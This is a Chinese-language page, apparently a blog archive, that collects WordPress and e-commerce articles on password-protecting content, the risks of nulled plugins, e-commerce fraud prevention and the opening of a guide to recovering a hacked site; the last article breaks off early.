    cPanel目录隐私

    如何使用密码保护文章、页面和WooCommerce产品

    如果您想对单个文章、页面或WooCommerce产品进行密码保护,WordPress实际上包含一个内置功能,可帮助您通过其Visibility设置进行设置。

    您将在WordPress编辑器中找到Visibility设置,因此您可以将它用于我们上面提到的每种类型的内容,以及您可能在您的网站上使用的任何其他自定义文章类型

    开始:

    • 打开要添加密码保护的内容的WordPress编辑器。
    • 在右侧边栏中找到Visibility选项。
    • 点击它。
    • 选择Password Protected并输入您要用于解锁文章的密码。

    这是新的WordPress区块编辑器中的样子:

    在区块编辑器中哪里可以找到可见性选项

    在区块编辑器中哪里可以找到可见性选项

    这是旧版经典WordPress编辑器中的样子:

    在哪里可以找到WordPress的可见性设置

    在哪里可以找到WordPress的可见性设置

    发布或更新内容后,系统将提示访问者输入密码,然后才能查看文章。此外,WordPress将在文章标题前添加“受保护”:

    内置WordPress密码保护的工作原理

    内置WordPress密码保护的工作原理

    这种方法的一个很酷的转折是,您实际上可以让人们通过一次输入密码来解锁多个文章。要进行此设置,您需要做的就是在多个文章中重复使用相同的密码。容易,对吧?

    一旦访问者输入一次密码,它会自动解锁所有使用相同密码的内容。但是,如果另一部分内容使用不同的密码,则访问者仍需要输入该唯一密码。

    最后,为了让您了解这种类型的密码保护如何适用于不同的内容,以下是它如何与WooCommerce产品一起使用。您可以看到Visibility控件显示在同一位置:

    如何使用密码保护WooCommerce产品

    如何使用密码保护WooCommerce产品

    如何使用密码保护某个类别的WordPress文章

    作为密码保护单个内容的替代方法,您还可以密码保护整个类别

    这种方法的好处是,它可以让您更轻松地为多个内容添加密码保护,并且对访问者来说也更简单,因为他们只需输入一次密码即可解锁该类别中的所有内容。

    不过,要设置此功能,您需要插件的帮助。我们推荐两种选择:

    1. Password Protected Categories,来自Barn2 Media的付费插件
    2. Access Category Password,WordPress.org上的免费插件

    如何使用Password Protected Categories

    Password Protected Categories的工作原理基本上是将您在上一节中看到的相同“密码保护”功能添加到您的类别中。

    安装并激活插件后,您可以转到文章 → 类别并编辑要添加密码的类别。在底部,您现在将看到用于密码保护单个内容的相同Visibility框。

    选择Password protected并输入您想要的密码。

    一件好事是该插件允许您添加多个密码,每个密码都将解锁该类别。这使您可以为每个人/组提供一个唯一的密码,以便将来在需要时更轻松地删除访问权限:

    如何将密码添加到类别

    如何将密码添加到类别

    保存更改后,每当访问者尝试访问受密码保护的类别中的文章时,都会提示他们输入密码:

    解锁类别的密码表格

    解锁类别的密码表格

    通过转到Settings → Protected Categories,您还可以访问一些额外的设置,让您控制插件的功能。你可以:

    • 设置密码的过期时间(例如,在访问者需要再次输入密码之前内容被解锁多长时间)。
    • 选择是否仍然在您网站的公共区域中显示受保护类别中的内容,或者是否在有人输入密码之前完全隐藏它们。
    • 自定义您在上面看到的登录表单。

    密码保护类别设置

    密码保护类别设置

    如果您经营的是WooCommerce商店,同一开发人员也有一个类似的插件,旨在与WooCommerce一起使用,称为WooCommerce Protected Categories

    如何使用Access Category Password

    Access Category Password可在WordPress.org免费获得。安装并激活它后,您可以转到设置→Access Category Password

    在那里,您可以:

    • 选择要使用的密码。
    • 选择要密码保护的类别。
    • 将某些用户角色列入白名单,以便他们无需输入密码即可查看隐藏类别。
    • 选择是使摘录仍然公开还是隐藏所有内容。
    • 自定义登录页面/密码保护通知。

    Access Category Password设置

    Access Category Password设置

    保存更改后,访问者在尝试访问受限类别中的任何内容时需要输入密码。

    虽然此插件是免费的,但一个缺点是您只能输入一个密码,并且您必须对要密码保护的所有类别使用相同的密码。

    如果您想为每个类别使用不同的密码,那么使用上面的受密码保护的类别插件可能会更好。

    这里的另一个区别是,即使在用户输入密码之前,Access Protected Categories仍然显示文章标题,而上面的Password Protected Categories插件隐藏了标题:

    Access Category Password表单

    Access Category Password表单

    如何密码保护WordPress文章的一部分

    最后,让我们看看如何用密码保护一部分公开的WordPress文章的最具体方法。

    要设置此功能,您可以使用WordPress.org上的免费Passster插件

    安装并激活插件后,转到设置 → Passster以生成用于限制内容的简码。

    输入您想要的密码并选择Generate Password

    Passster简码生成器

    Passster简码生成器

    然后,保存您的更改并复制Passster为您提供的简码:

    复制Passster简码

    复制Passster简码

    然后,将此短代码添加到您要使用密码保护的内容中。此外,编辑“Your content here”占位符并将其替换为您想要密码保护的内容:

    Passster短代码示例

    Passster短代码示例

    发布文章后,以下示例显示了默认密码保护表单的外观:

    Passster登录表单

    Passster登录表单

    要自定义此表单的外观,您可以使用 WordPress Customizer(外观 → 自定义)。

    在WordPress定制器中查找Passster部分。在那里,您将能够自定义表单的文本和颜色:

    WordPress定制器中的Passster样式选项

    WordPress定制器中的Passster样式选项

    概括

    无论您是想限制对整个网站、部分内容的访问,还是介于两者之间的访问权限,您都可以通过多种方式对WordPress进行密码保护。

    选择最适合您的方法,按照我们教程中的步骤操作,并享受新的WordPress密码保护功能。

  • 为什么你应该停止使用无效的WordPress插件和主题

    为什么你应该停止使用无效的WordPress插件和主题

    没有人喜欢花不必要的钱——这是人之常情。即使是世界上最富有的人之一,沃伦巴菲特,仍然会搜索他购买的汽车的折扣(好吧,也许这是一个极端的例子——你明白了)。

    因为人们总是在寻找降低成本的方法,一些WordPress用户倾向于转向无效的WordPress主题和插件,而不是为官方高级版本付费

    在这篇文章中,我们将告诉您为什么使用无效的WordPress插件和主题是一个坏主意……即使它不一定违反任何法律。

    什么被认为是空插件和主题?

    当涉及到术语无效时,网络上有各种定义。正如我们定义的那样,它指的是高级 WordPress 插件或主题已被黑客入侵或包含旨在造成伤害或收集信息的修改代码。这些是从第三方网站(不是原始作者或创建者)获得的,有时无需许可证密钥即可工作。

    无效的WordPress插件和主题不一定是非法

    让我们从房间里的大象开始……

    如果您使用无效的WordPress插件或主题,FBI不太可能会敲门。这是因为,与人们通常“盗版”的其他内容(例如音乐、电影)相比,无效的WordPress插件和主题通常不会违反法律。

    这里的原因与GPL(通用公共许可证)有关。如果不将此作为版权课程,您只需要知道GPL许可允许的部分内容是任何人都可以自由分发GPL许可软件(是的——甚至是高级GPL许可软件)。

    因此,如果一个无效的插件站点将一个GPL许可软件供下载,从技术上讲,他们并没有违法,因为他们有权自由分发该GPL代码。

    GPL是WordPress的重要组成部分,大多数(但不一定是全部)WordPress主题和插件都使用 GPL。这部分是因为主题和插件必须符合GPL才能在WordPress.org目录中列出。

    虽然高级插件不需要GPL许可证,但许多插件在WordPress插件库上也有免费增值版本,然后需要GPL许可证。或者他们选择拥有GPL许可证。许多高级插件,如WP Rocket和Gravity Forms都是GPL许可的。

    还有其他原因——比如能够在插件和主题中使用现有的GPL许可代码。通常,如果您在产品中使用现有的GPL许可代码,则必须在GPL下发布后续产品(这就是2017年WordPress和Wix之间争吵的原因)。

    GPL很复杂,我们过度简化了一些原则,以将核心思想浓缩成几段。但基本上——你看到的大多数无效的WordPress插件和主题可能没有做任何违法的事情。事实上,GPL是WordPress出色的原因之一。

    但这并不意味着你应该出去把你的网站装满无效的扩展……

    仅仅因为无效的扩展是合法的,这并不意味着在您的WordPress网站上使用它们是一个好主意。

    以下是您仍然不应在您的网站上使用无效插件或主题的四个原因。

    1. 你不知道代码中还有什么
    2. 开发人员需要资金来继续改进他们的产品
    3. 您不会从开发人员那里获得任何支持
    4. 您不会获得任何自动更新

    1.你不知道代码中还有什么

    当您从开发人员以外的来源(或受信任的插件库,如WordPress.org)下载扩展程序时,您不知道代码中还隐藏着什么。

    恶意行为者喜欢使用无效的插件或主题来插入他们自己讨厌的有效载荷,例如为SEO注入链接,甚至更险恶的行为。

    当您使用空扩展时,您将自己暴露在这种类型的漏洞中,因为除非您有知识和时间来挖掘所有代码,否则您不知道空扩展中还隐藏着什么。

    除此之外,您可能会取消主机的任何潜在帮助。例如,服务器提供商提供免费的黑客修复保证,但如果您的WordPress网站由于无效插件或主题中的后门而被黑客入侵,则此保证不适用。

    这不是一个普遍的问题,因为您可以找到提供清洁产品的合法GPL俱乐部(通常按月收费)。但是,即使您为提供免费下载恶意代码的GPL俱乐部付费,这些扩展不是一个好主意还有其他重要原因。你怎么知道哪个GPL俱乐部可以信任?

    付费GPL俱乐部的示例

    付费GPL俱乐部的示例

    这就是为什么我们通常将从第三方网站获得的插件称为无效的。如果您不是从原作者那里获得它,那么假设它可能已经修改、不安全的代码,甚至是病毒,这样会更安全。您可以使用像VirusTotal这样的在线工具来扫描插件或主题的文件,以查看它是否检测到任何类型的恶意软件。

    Virus Total

    Virus Total

    2. 开发人员需要资金来继续改进他们的产品

    虽然大多数开发人员确实喜欢创建WordPress产品,但他们中的大多数人也喜欢吃东西并负担得起。

    也就是说,WordPress开发人员需要收入才能证明他们花在维护和改进产品上的时间是合理的。

    当您使用无效的扩展程序时,您将剥夺他们可以用来进一步增强其插件的收入。

    基本上,你是在自取其辱!

    如果每个人都使用无效版本,Elementor页面构建器团队是否能够继续推出新功能,例如主题构建?如果没有钱进来,OceanWP主题会拥有所有这些很棒的附加组件吗?

    不!当然不是。

    如果您不遗余力地寻找插件或主题的无效版本,这可能意味着您认为它是您网站的宝贵补充。

    因此,即使您认为开发人员为构建您的产品所付出的所有辛勤工作不值得支付,您为什么要剥夺自己在未来获得更好产品的机会?

    基本上,你应该帮助开发人员把食物摆在桌面上,这样他们就可以继续创造让你的生活更轻松的很棒的东西。

    3. 你不会得到开发者的任何支持

    无效的扩展可以让您获得高级插件或主题的所有功能,但它们永远无法让您获得付费客户获得的所有好处。

    这是因为您使用GPL许可软件所支付的很大一部分费用是来自开发人员的支持

    当您为产品付款时,如果您遇到任何产品问题,您可以选择直接与开发人员联系。

    另一方面,使用无效的扩展名,您将获得零支持。碰钉子?希望谷歌有所帮助!因为这几乎是你唯一的选择。如果您使用的插件在 WordPress 存储库中有免费版本,您也许可以在那里得到响应。但说实话,这很像玩彩票。这仅仅是因为开发人员根本负担不起免费工作。

    如果你浪费了三个小时来解决一个开发者可以在五分钟内为你解决的问题,你到底真的“省钱”了吗?可能不会(如果您珍惜时间)。

    4. 你不会得到任何自动更新

    为了启用高级插件或主题的自动更新,您将需要一个许可证密钥。

    如果没有有效的许可证密钥,您将不得不在每次有新更新时手动更新扩展。

    这有两个大问题:

    首先,这很烦人且耗时。您不必简单地单击一个按钮,而不必每次都删除并重新上传插件。

    没有许可证密钥不提供更新

    没有许可证密钥不提供更新

    不过,这还不是最大的问题

    更重要的是,您将不再在WordPress仪表盘中收到红色更新通知。这意味着您必须找到另一种方法来跟踪新更新何时发布。

    如果开发人员发布了紧急安全修复程序,但您直到几周后才收到备忘录怎么办?过时的扩展是WordPress网站的一大攻击媒介,因此如果您无法及时应用新的更新,您的网站就会面临不必要的风险。

    确实有些GPL俱乐部会去获取最新版本,然后他们会在他们的网站上发布更新。但是你想信任谁呢?拥有一千个不同插件的GPL俱乐部,或者插件的开发者。这种风险值得节省几块钱吗?

    例外

    我们看不到使用无效插件或主题的任何充分理由。但是,如果您真的想挑剔,这是我们个人从用户那里听到的一种情况。

    许多高级WordPress插件没有免费版本或试用版,并且它们的退款政策可能仅适用于由于技术原因插件无法工作的情况。很多时候,插件开发人员必须严格遵守他们的退款政策,以防止那些试图获得免费副本的人滥用。

    如果您是WordPress开发人员、代理机构或自由职业者,在某些情况下您可能只需要查看插件是否适用于客户。如果插件最终无法满足您的需求,购买插件可能并不总是有意义。因为那样你就没有钱了。

    在本地或临时站点(从不生产)上测试无效的插件或主题 可能是您决定走的路线。我们不会在我们的网站上分享从哪里获得这些内容。

    如果您这样做并发现插件或主题确实提供了,那么请务必与您的客户聊天并购买它以获得合法的许可证密钥、支持和更新。

    不要在生产站点上使用空扩展——这不值得

    从表面上看,免费获得高级插件或主题似乎很划算。但在我们看来,这不值得。即使你找到了合法、干净的GPL插件和主题的来源,你仍然会浪费额外的时间,因为你:

    • 由于您无法获得支持,因此必须自己配置和修复所有内容。
    • 将不得不不断检查新版本并手动更新自己。

    时间就是金钱,无效的插件和主题将花费您更多的时间来使用。

    除此之外,你只是剥夺了开发人员已经投入的辛勤工作的回报,以及继续改进他们的产品的资金。即使您对那里的道德影响没有任何问题,如果每个人都使用无效扩展,您也会失败,因为开发人员没有动力进行改进。

    所以 – 当涉及到无效安装时 – 在安装主题或插件之前请三思而后行。特别是如果您正在构建或在其他人的 WordPress 网站上工作。以后不要让您的客户陷入困境。我们已经多次看到这种快乐的方式。

    如果您真的有预算,请考虑WordPress.org上提供的55,000多个免费插件和数千个免费WordPress主题之一。

  • 电子商务欺诈预防:7种最严重的诈骗以及如何预防

    电子商务欺诈预防:7种最严重的诈骗以及如何预防
    您的怀疑是正确的:电子商务欺诈正在增加。根据 LexisNexis Risk Solutions的一项年度研究,准确地说是上涨了近30% 。更令人不安的是: 根据Digital Commerce 360​​的数据,这个数字几乎是电子商务销售额增长的两倍

    更糟糕的是,电子商务商家必须在两个不同的战线上打击欺诈行为。一方面,您必须保护自己免受专门针对商家的计划的影响,例如欺诈性退款或网站模仿(见下文)。

    但最重要的是,您还必须保护您的客户免受诈骗。在您的网站上窝藏诈骗者对于在线商店来说是一个死亡之吻,即使您和购物者一样都是受害者。

    幸运的是,电子商务欺诈预防也在 增加,其方法与他们挫败的骗局一样复杂。在本文中,我们概述了7种最严重和最常见的电子商务欺诈诈骗:它们的工作原理、需要注意的警告信号、最佳防御措施以及 10 种用于优化安全性的电子商务欺诈预防工具。

    1. 需要注意的7种最糟糕的电子商务欺诈诈骗
    2. 电子商务欺诈警告标志:在骗局开始之前阻止骗局
    3. 电子商务欺诈预防:您的铁腕防御
    4. 电子商务欺诈预防的10大最佳工具

    需要注意的7种最糟糕的电子商务欺诈诈骗

    您防范电子商务欺诈的第一道防线就是知道要注意什么。以下是在线商店最容易受到的7种最常见的骗局。

    1. 电子邮件帐户网络钓鱼

    大多数人都熟悉电子邮件网络钓鱼诈骗,所以让我们从那里开始。这些与互联网本身一样古老,所以你们中的许多人可能已经打开了一封来自陌生人的电子邮件,要求提供敏感的帐户信息。

    但是,最近我们看到冒充尼日利亚王子,而是冒充电子商务商店的诈骗者有所增加。他们发送伪装成订单/交货确认的电子邮件,旨在提取敏感帐户数据或将受害者引导至欺诈网站。

    冒充亚马逊的网络钓鱼电子邮件示例

    冒充亚马逊的网络钓鱼电子邮件示例(图片来源:SecureWorld)

    在最好的情况下,这些会导致意外的广告页面而不是官方商店页面。其他时候,它不是那么无害。网络钓鱼电子邮件中的链接通常会进入带有病毒、恶意软件或其他与黑客相关的不幸事件的站点。这就是为什么总是建议将鼠标悬停在可疑链接上而不是单击它们。

    2.身份盗用

    如果某个可怜的灵魂在网络钓鱼电子邮件中丢失了他们的帐户信息,接下来会发生什么?骗子获取了这些信息并为自己购买了一堆昂贵的礼物,并猜测谁支付了账单。冒充他人并使用他们的财务信息进行购买被称为身份盗用。

    听起来很奇怪,零售商往往是身份盗窃受害最深的人:信用卡公司通常会代表受害者发起退款,但没有义务退回商品。即使零售商设法回收产品,它们也不再是新产品。零售商能够毫发无损地逃脱身份盗窃的唯一方法是在它开始之前阻止它。

    还值得一提的是,网上商店也需要提防在不知情的情况下成为身份盗用的帮凶。如果您的网站不安全,黑客可以从您的眼皮底下窃取您客户的信息——就像2013年Target黑客事件中的百万美元案件一样。

    3. 页面劫持

    您在一个您之前使用过数百次的网站上,但是这一次,在这个特定的页面上,有些东西似乎……关闭了。可能是该网站的其中一个页面被劫持了。页面劫持是指黑客创建模仿现有网站的欺诈性网页。

    更高级的案例包括劫持一个排名靠前的网站并窃取其搜索引擎流量。页面劫持也通常与“捕鼠器”相关联,在这种情况下,页面会阻止用户退出,例如,每次用户尝试关闭浏览器时都会打开一个新窗口,或者在他们的计算机上充斥着无休止的弹出窗口。

    但就电子商务而言,页面劫持是另一种有效的网络钓鱼技术,例如模仿网站的登录页面来收集用户名和密码。电子商务品牌最不想要的就是他们的客户每次登录时都会对他们的合法性进行第二次猜测。

    4. 退款欺诈

    退款欺诈非常简单,而且非常普遍。基本上,诈骗者购买了一个大型电子商务订单,然后在发货后取消付款。他们在商品到达时保留商品,无需支付一分钱。

    方法各不相同,尽管它可以像骗子自己打电话给信用卡公司并说他们的身份被盗一样简单。

    另一种流行的技术是声称交货从未到达,因此诈骗者免费收到重复订单。即使骗局被及时发现,即使在最好的情况下,商家仍然必须调查虚假索赔。

    更糟糕的是,商家必须将“友好欺诈”与实际的拒付欺诈区分开来。

    友好欺诈是指合法客户意外造成拒付欺诈,例如错过包裹递送或输入错误的付款详细信息。商家对退单是出于恶意还是只是一次意外一无所知,担心会因欺诈指控冒犯善意的客户。

    在订阅模式下运营的电子商务品牌经常处理友好的欺诈行为,因为客户声称他们不知道这些费用会重复发生。 订阅品牌最好在客户注册之前明确收费。

    5.三角欺诈

    让我们进入更高级的欺诈计划,为更聪明和有经验的骗子保留。为了解释三角测量欺诈的工作原理,让我们将其分解为几个步骤。

    1. 骗子为具有显着价格标记的真实产品创建虚假列表。这也不总是那么欺诈。像eBay这样的网站允许用户在没有验证的情况下发布和销售商品。
    2. 客户从虚假列表中“购买”产品,向诈骗者提供所有个人数据。
    3. 诈骗者获取客户的数据并在不同的站点以更少的价格为他们购买相同的商品。他们将物品运送给客户。
    4. 客户收到他们购买的商品,却没有意识到他们多付了钱。骗子保留加价利润。

    这个骗局最狡猾的部分之一是受害者甚至不一定知道他们被骗了

    此外,成功的三角测量欺诈者会积累一长串的账户数据和信用卡号码。通常情况下,他们在第 3 步使用不同的信用卡来消除气味。

    这意味着三角欺诈的受害者可能会在数月或数年后再次在不相关的骗局中使用他们的数据。

    6. 联盟欺诈

    特别针对具有会员计划的电子商务商家,会员欺诈是指诈骗者操纵或滥用会员链接以获得更大的回报。换句话说,如果会员为他们发送网站的每个访问者而获得报酬,那么诈骗者可以使他们看起来好像他们发送的访问者比他们实际发送的更多,从而获得更高的薪水。

    联盟欺诈通常涉及黑客和自动化系统,但在某些情况下,它可以像使用稳定的虚假配置文件一样简单。诈骗者通常必须具备一定水平的计算机技能才能巧妙地避免被发现。

    7. 供应商身份欺诈

    最后,另一个针对商家的欺诈计划:骗子冒充制造商、批发供应商或其他B2B企业,承诺提供他们从未打算提供的服务。在线商店注册,交了一些钱,但再也没有收到供应商的消息。

    这些骗局在网络钓鱼甚至网页劫持等其他骗局中发挥了很大作用,最大的区别在于它们针对的是企业而不是消费者。这是我们始终建议彻底研究与您开展业务的人的原因之一。

    电子商务欺诈警告标志:在骗局开始之前阻止骗局

    一盎司的预防胜过一磅的治疗。

    预防电子商务欺诈的最有效方法是及早识别警告信号以避免它们。以下是每个在线商店都应注意的一些危险信号:

    • 送货地址和帐单地址不同。 就好像身份盗用和三角欺诈经常发生的情况一样,卡的所有者没有收到货物。
    • 同一商品的多个订单。电子商务欺诈者倾向于瞄准高价商品,当他们找到自己喜欢的商品时,他们会一遍又一遍地使用它。无论如何,货物通常都被围起来,所以它更多的是关于货币价值而不是实际产品。
    • 多个订单到同一地址但不同的卡。过度使用相同的被盗卡号会引起不必要的关注和怀疑,因此有经验的诈骗者喜欢更改它……而且使用不同的信用卡号比将货物运送到不同的地址更容易(请务必查看我们的指南,了解如何使用Stripe Radar预防和减少98%的信用卡欺诈)。
    • 可疑的大订单(尤其是加急运输)。与大多数犯罪一样,诈骗者希望确保回报值得冒险。这就是为什么电子商务诈骗经常涉及大订单,以防这是欺诈者的最后一次。他们还希望交易所在受害者流行之前尽快通过,从而加快运输速度。
    • 可疑的电子邮件地址或电话号码。身份盗用很少是万无一失的——通常有一两个漏洞。继续留意看起来不相干的电子邮件地址(不同的姓名、冒充个人的公司等)以及可疑的电话号码(即与帐单地址不同的国家或地区代码)。
    • 重复拒绝交易。每个人都会发生一次或两次交易被拒绝,但反复拒绝交易是一个危险信号。尽管有时是无辜的,但这可能表明有人试图猜测他们无法合法访问的敏感信息。

    电子商务欺诈预防:您的铁腕防御

    既然您知道所有可能发生在您身上的不幸,让我们继续讨论您在这里的真正原因:确保它不会发生!这是有关电子商务欺诈预防和保护您的在线商店免受欺诈的最佳建议。

    PCI合规性

    首先,从电子商务欺诈预防的官方指南开始:支付卡行业安全标准委员会 (PCI SSC)。基本上,世界上最大的信用卡品牌齐聚一堂,列出了一系列避免诈骗的最佳做法。将这些视为预防电子商务欺诈的最低要求,也是一个很好的起点。

    幸运的是,许多支付网关可以为您处理PCI合规性,因此您可以通过选择更安全的网关来直接解决问题。您可以通过PCI SSC博客直接访问源代码。

    PCI安全标准委员会

    PCI安全标准委员会

    AVS和CVV

    打击欺诈更容易实现的目标:地址验证服务 (AVS) 和卡验证值 (CVV)。这些标准安全措施比建议更接近规则。

    AVS 确保输入的帐单地址与记录的帐单地址一致,而CVV要求客户输入卡背面的三位数代码(以防身份窃贼仅窃取卡号,而不是实际卡)。

    这两种保护措施通常都包含在支付处理器中,因此在选择您的之前确保它们存在。

    交货时要求签名

    由于涉及虚假身份的电子商务骗局如此之多,物理签名可能会带来很大的影响。尽管此选项可能会根据您的运输方式花费额外费用,但它是防止身份盗用、欺诈性拒付和三角测量计划的一个很好的防御措施。

    如果诈骗者试图说服您他们是其他人,或者货物从未送达,那么所需的签名就会使他们陷入自己的陷阱。

    亲自跟进

    骗子喜欢懒惰的受害者。他们从不看两次。

    成功的骗局包括事情从裂缝中掉下来,因此最有效的预防措施之一是跟进怀疑。如果您有空闲时间,多加注意和肘部油脂可以准确地揭示骗子不希望您看到的内容。考虑以下选项:

    • 亲自向客户发送电子邮件,以查看他们的电子邮件地址是否真实。 如果您礼貌地解释您的怀疑,无辜的客户不会介意,但诈骗者不会知道该怎么做。在他们的回答中注意语法和拼写,看看英语是否是他们的第二语言。
    • 在社交媒体上验证此人。搜索他们的姓名和/或用户名以查看他们是否真实,以及他们的个人资料是否与他们的其他信息匹配。
    • 拨打客户的电话。这是验证某人是他们所说的人的最快途径。
    • 延迟发货。正如我们所说,诈骗者希望他们的操作尽快完成,以减少被抓的机会。如果您故意延迟发货,并告诉他们太多,可能会吓跑他们。这会给诚实的购物者带来不便,因此请仅在必要时使用。

    当然,你没有时间为每一个订单都做这一切,所以一个好的开始是培养你的直觉。学会及早识别可疑订单,如果你觉得有什么不对劲——哪怕只是一点点——千万不要忽视它。

    始终使用HTTPS

    HTTP和HTTPS有什么区别?一句话,加密。HTTPS与另一种协议安全套接字层 (SSL)一起使用,以保护在互联网上“移动”的数据。HTTP(没有S)没有,所以 HTTPS 总是更好地避免黑客。可以将其视为S 代表安全性。

    HTTPS还有其他好处,例如更好的SEO排名和更准确的推荐数据。如果您使用的是WordPress,请阅读我们关于如何从HTTP切换到HTTPS的深入指南。如果您正在管理WooCommerce商店,这里是安装SSL证书的方法。

    更安全的密码

    最后但并非最不重要的一点是,您可以通过要求客户拥有更安全、更复杂的密码来与客户分担安全负担。当然,没有人喜欢那些烦人的密码要求,尤其是如果他们在大量网站上拥有帐户……但实际上,被信用卡诈骗所困扰比记住新密码要麻烦得多。

    目前,行业标准是八个字符、一个大写字母和一个特殊字符。另一个比这更少的是风险,为了提高安全性,您可以添加更多要求,例如数字,甚至是随机生成的密码。

    电子商务欺诈预防的10大最佳工具

    在与欺诈作斗争的过程中,您并不孤单,如果您知道去哪里寻找,那么您有大量的盟友。以下是预防电子商务欺诈的10款最佳软件。

    1. Signifyd

    Signifyd

    Signifyd

    Signifyd的规模可伸缩以适应大型和小型企业,是最先寻找欺诈预防软件的地方之一。它在您商店的后端运行,并根据欺诈的可能性为每次购买分配一个“分数”。

    用户可以选择自己处理案件或寻求Signifyd团队的帮助。他们还为特定订单提供保险,以防万一出现您无法确定的可疑情况,让您更加安心。

    2. Sift

    Sift

    Sift

    前身为Sift Science的欺诈预防工具Sift面向高端商店——更多功能,更多钱。虽然您可以购买单独的套餐,但全套套餐提供:

    • 订单评估
    • 假账户预防
    • 帐户接管预防
    • 滥用促销预防
    • 内容的垃圾邮件预防
    • 设备指纹识别API

    Sift将其机器学习吹捧为业内最好的之一,因此也许这与其他功能一起证明了价格标签的合理性。

    3. Simility

    Simility

    Simility

    Simility专注于“设备指纹识别”,识别设备并评估其威胁级别。通过监控设备的数据——位置、操作系统、语言、网络浏览器、用户名,甚至电池电量!— Simility将设备与任何黑名单进行交叉引用,并确定其威胁级别。

    4.DupZapper

    Dupzapper

    Dupzapper

    DupZapper易于使用、安装快速且无需API集成,是一款低维护、高回报的软件。他们的算法旨在规范在线游戏,检测重复帐户、地理一致性、cookie阻止和代理使用等。如果您正在寻找轻松轻松的欺诈预防工具,这是我们的建议。

    5.Kount

    Kount

    Kount

    Kount是大通银行和GNC等全球企业的最爱,是另一种高成本、高质量的选择。如果您有预算,Kount会使用一些最先进的技术来访问交易风险,利用200多个数据变量。他们的系统也是最快的系统之一,响应时间不到一秒(准确地说是300毫秒)。对于预算庞大的大公司,这种速度在处理您的日常订单时会很有用。

    6. Subuno

    Subuno

    Subuno

    Subuno以其低廉的价格提供了很多:20多种欺诈检测工具,可分析100多种风险因素。对于那些预算不多但仍然优先考虑网站安全的人来说,这是一个首选,尤其是考虑到它适用于Shopify和WooCommerce等电子商务网站。

    7. Riskified

    Riskified

    Riskified

    Riskified在几个方面将自己与其他电子商务欺诈预防软件区分开来。首先,他们使用闪电般的实时报告。如果您想要Kount等高端软件的速度,但又没有企业级定价,这是一个不错的选择。

    撇开“欺诈评分”模型不谈,Riskified为每个订单提供了清晰的“批准/拒绝”分析。它还适用于滑动规模,您只需为产生销售的已批准订单付费,这为小型在线商店提供了一个明智的选择。

    8. FraudLabs Pro

    FraudLabs Pro

    FraudLabs Pro

    与此列表中的其他欺诈预防工具相比, FraudLabs Pro具有几个强大的优势。也就是说,它使用独特的检测方法,包括对电子邮件(如电子邮件域年龄)、社交媒体、ISP和用户名的真实性检查。

    但另一个优势更有吸引力:一个可行的免费 计划,每月接受多达500个查询。对于刚刚推出的小商店或品牌来说,这是在线安全的幸运发现。

    9. Forter

    Forter

    Forter

    Forter针对移动交易进行了优化,几乎可以为任何交易提供广泛、全面的覆盖,无论地理位置或支付方式如何。它最受欢迎的功能之一是其定制选项,允许用户关注特定的风险概况或支付网关。它还使用快速、实时的报告,带有简单的“是/否”报告,而不是欺诈分数。

    10. Bolt

    Bolt

    Bolt

    从技术上讲,Bolt与其说是防欺诈解决方案,不如说是一种结账UI解决方案……但是,由于防欺诈内置于其系统中,因此它兼具两者的资格。Bolt是针对欺诈检测和用户体验的优化结账系统,旨在通过可用性增加销售额并减少放弃。

    Bolt在结账期间扫描200多个行为数据点以评估风险。再加上它的可用性优势,使其成为在线商店的绝佳选择,这些在线商店需要更多领域的帮助,而不仅仅是在线安全。

    小结

    您的欺诈预防安全措施直接提高了您的电子商务品牌的成功——或者更准确地说,您未能防止欺诈计划直接阻碍了您的成功。随着电子商务欺诈的增加,安全性现在比以往任何时候都成为在线商店更高的优先级。

    幸运的是,如果你保持警惕,你可以避开它。查看上面列出的7种最常见的骗局,可以这么说,让您“了解您的敌人”,并为即将发生的事情做好准备。同样,请查看我们概述的警告标志和危险信号,以便您可以在欺诈尝试仍然只是“尝试”时发现它们。

    我们列出了有效的DIY电子商务欺诈预防方法——任何在线商店所有者都可以从头开始自己实施的技术。但是您的电子商务品牌越大,您需要的外部帮助就越多。排名前10位的欺诈预防工具适合每个人,因此请查看我们的评估,找到最适合您的需求、目标和限制的工具。

  • 当您的WordPress网站被黑时该怎么办

    当您的WordPress网站被黑时该怎么办

    WordPress网站被黑。如果它发生在你身上,很容易恐慌。在这篇文章中,我将帮助您确定您的网站是否被黑客入侵,指导您完成清理网站的步骤并帮助您提高网站的安全性。

    最后,我将为您提供一些提示,以防止您的WordPress网站将来再次被黑客入侵。

    1. WordPress被黑:表明您的WordPress网站存在风险
    2. 为什么WordPress网站会被黑客入侵
    3. WordPress如何被黑客入侵?
    4. WordPress网站被黑:怎么办(分步指南)
    5. 如何防止您的WordPress网站被黑客入侵

    WordPress被黑:表明您的WordPress网站存在风险

    您的WordPress网站未按应有的方式运行。但是你怎么知道这个问题是由于黑客攻击造成的?让我们看一下您的网站已被黑客入侵的一些迹象:

    • 无法登录
    • 您的网站在您没有做任何事情的情况下发生了变化(例如,主页已被静态页面替换或添加了新内容)。
    • 您的网站正在重定向到另一个网站。
    • 当您或其他用户尝试访问您的网站时,您会在浏览器中收到警告。
    • 当您搜索您的网站时,Google会发出警告,表明它可能已被黑客入侵。
    • 您已收到来自安全插件的违规通知或意外更改通知。
    • 您的托管服务提供商已警告您有关您帐户的异常活动。

    让我们更详细地看一下其中的每一个。

    您无法登录

    如果您无法登录您的网站,则可能表明您的网站已被黑客入侵。但是,您更有可能刚刚忘记了密码。因此,在您假设您已被黑客入侵之前,请尝试重置您的密码。如果你不能,那是一个警告信号。即使可以,您可能仍然被黑客入侵,您必须进行更多调查。

    黑客有时会删除用户或更改用户密码以阻止访问。如果您无法重置密码,则您的用户帐户可能已被删除,这是黑客入侵的迹象。

    您的网站已更改

    黑客的一种形式是用静态页面替换主页。如果您的网站看起来完全不同并且没有使用您的主题,则它可能已被黑客入侵。

    这些更改可能更加微妙,可能会添加虚假内容或指向令人讨厌的网站的链接。如果您的页脚充满了您没有添加的链接,特别是如果这些链接被隐藏或字体很小,那么您可能已被黑客入侵。

    在您假设您已被黑客入侵之前,请与其他网站管理员或编辑核实,以确保他们没有意外进行更改。

    如果您的主题不是来自信誉良好的来源并且您最近更新了它,那可能是罪魁祸首。

    您的网站正在重定向

    有时,黑客会添加一个脚本,当人们访问您的站点时将其重定向到另一个站点。这可能是您不希望您的用户被带到的网站。

    当我管理的一个学校网站重定向到一个约会网站时,这发生在我身上。正如你可以想象的那样,我的客户很不高兴,不得不放弃我正在做的所有其他事情并立即修复它。事实证明,这是服务器上的不安全问题,而不是我的网站上的安全问题,这是只使用优质托管的原因之一。我尽快更换了托管服务提供商并几乎立即修复了这个问题。

    浏览器警告
